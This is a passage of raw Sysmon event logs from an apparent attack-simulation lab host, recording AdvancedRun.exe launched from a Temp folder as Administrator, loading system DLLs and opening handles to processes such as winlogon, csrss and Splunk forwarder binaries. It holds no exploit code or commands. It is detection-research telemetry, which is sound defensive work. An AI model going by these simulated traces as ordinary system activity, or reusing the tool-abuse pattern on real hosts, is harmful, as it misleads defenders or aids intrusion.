18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015355Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004015354Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.333{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015353Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015352Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015351Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015350Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015349Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004015348Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004015347Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004015346Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.318{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-003D-61EB-F605-000000002702}1496C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004011671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|